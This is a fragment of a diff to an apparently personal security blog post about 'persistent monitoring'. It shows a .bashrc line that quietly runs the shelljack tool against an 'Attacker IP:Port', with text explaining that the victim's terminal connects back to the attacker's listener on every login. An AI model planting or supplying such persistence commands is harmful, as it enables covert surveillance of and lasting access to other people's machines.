M4luk0/m4luk0.github.io/_posts/2022-01-25-Persistent-monitoring.md

 tty &>/dev/null; /home/code/shelljack/shelljack -n Attacker IP:Port $$ &>/dev/null
 ```

-Now, everytime the victim logs in the machine, if we have the listener, he is going to connect us.
+What is inside .bashrc will be executed every time the user opens a terminal, so if we put the command to connect with shelljack, we will get persistence.